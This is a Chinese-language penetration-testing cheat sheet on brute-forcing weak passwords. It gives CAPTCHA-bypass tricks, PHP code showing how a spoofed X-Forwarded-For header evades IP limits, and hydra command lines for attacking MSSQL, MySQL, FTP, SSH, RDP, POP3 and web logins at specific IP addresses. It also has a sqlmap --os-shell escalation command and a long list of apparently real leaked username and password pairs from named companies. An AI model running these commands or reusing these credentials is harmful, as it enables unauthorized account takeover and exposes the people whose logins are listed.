弱口令
相关文章
https://github.com/Gamma-laboratory/JsFak --selenium模拟爆破绕过JS加密
验证码
验证码泄露 网站的源码中 请求的Cookie中 爆破 无条件不刷新 -验证码固定 - 直接爆破 有条件不刷新(如客户端通过js生成)- 验证码在前端校验-抓包爆破 验证码自动识别 通过接口返回验证码-接口唯一/验证码不唯一(Java一般以.do结尾)- 使用工具PKAV HTTP FUzzer 和 Burpsuite 爆破 burpsuite插件 reCAPTCHA
六位数验证码
https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2012-014618
Geetest滑动验证码
https://www.freebuf.com/articles/web/140693.html
绕过IP限制爆破 - PHP - 客户端重写HTTP_X_FORWARDED_FOR
$onlineip = ''; if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $onlineip = getenv('REMOTE_ADDR'); } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $onlineip = $_SERVER['REMOTE_ADDR']; } return $onlineip;
hydra - Windows
mssql hydra.exe -l sa -P c:\pass.txt 192.168.1.110 mssql mysql hydra.exe -L c:\user.txt -P c:\pass.txt 192.168.1.110 mysql FTP hydra.exe -l admin -P c:\pass.txt -t 5 192.168.1.110 ftp ssh hydra.exe -L users.txt -P password.txt -e n -t 5 -vV 192.168.1.110 ssh rdp hydra.exe -l administrator -P c:\pass.txt www.xxser.com rdp -V pop3 hydra.exe -l root -P pass.txt my.pop3.mail pop3 sqlmap.py -d "mssql://sa:pwd@123@192.168.1.110:1433/master" --os-shell sqlmap通过密码提权 Post登录 hydra -l admin -P pwd.txt -v IP http-post-form "/:username=^USER^&password=^PASS^&this_is_the=data&next=:<title>| Django site admin</title>"
hydra - Linux
root@kali:/home/SmithEcon/Dictionary# hydra -L mysqluser.txt -P mysqluser.txt 120.240.xx.162 mysql
hydra 150.xx.64.81 rdp -L rdpuser.txt -P rdppwd.txt -V
#cookier验证访问,可轻松绕过从而实施各种弱口令的账户暴破
#使用PHPSESSID进行验证码验证-》将PHPSESSID设置为固定值-》爆破
常见弱口令
网站后台 ouou/123456 admin/a123456 test/a123456 lifeng/123456 620723105/1111 admin/ironport root/111111 admin/1 xiangming.zhangxm/jpfxbhxm admin/alibabatw test/test chenhua/Qwer1234 zengxiaomin/123456 wangqian/wangqian123 adminzbird/zbird@tudou root/dazhong luyicheng/zhuzhu521 test/1qaz2wsx panda/panda qinxiaobo/Qwer1234 chenhua/Qwer1234 huangjunjie/fucknima liuxiaohui/Aa123456 tangjun/tangjun tudou/tudou123456 test/Ab123456 liu.juan/@WSX3edc youku/youku888 test/test123 fanghui/!QAZ2wsx project/7b2c5b51ec9e zhangqin/zq!@#123 samo/901107 wenjianbin/2wsx#EDC wenjianbin/123456Asd!@# pingpinganan/yishengpingan username/password hongchuan/hongchuan steven135904/123456 youku/123456 zhangqin/zq!@#123 baochan flyinghorse shiwei laowu ying.liuying jobs xin.zhouzx/123456 密码:hello1234 密码:p@ssw0rd 密码:1q2w3e4r5t 密码:ZAQ!2wsx 密码:949389 密码:901107 密码:1234567 密码: abc=3.14 密码:Asdf1234 密码:youku@123 陈梦宜/1 章继宗/1 admin/1 ┼攠數畣整爠煥敵瑳∨≡┩愾/a 中文姓名/姓名首字母+2014 用户名为公司邮件地址 @ 前的部分,密码为空 (RTX) dazhong/dazhong 用户名:admin') 密码:asdkjflkj 随便输入 可直接登陆 zb-bs-zhangxiaoxiang/12345678 tangjun/tangjun shencheng/123456 Mysql数据库 root/root
数据库 bpm/ca apollo/ca bpm/bpm apollo/kissqa
主机 nathan.yuhm/rNQzpwXH pass/hello12345
弱口令检测开源项目
https://github.com/shack2/SNETCracker
配合逻辑漏洞暴力破解
如果带有cookie,则无论如何提交账号,都返回空,删除cookie后,正常提交,服务器返回正常账号状态,
手工删除cookie使用hy1XXXXX格式的id,可组合12345678、admin123、password等弱口令进行批量猜测账号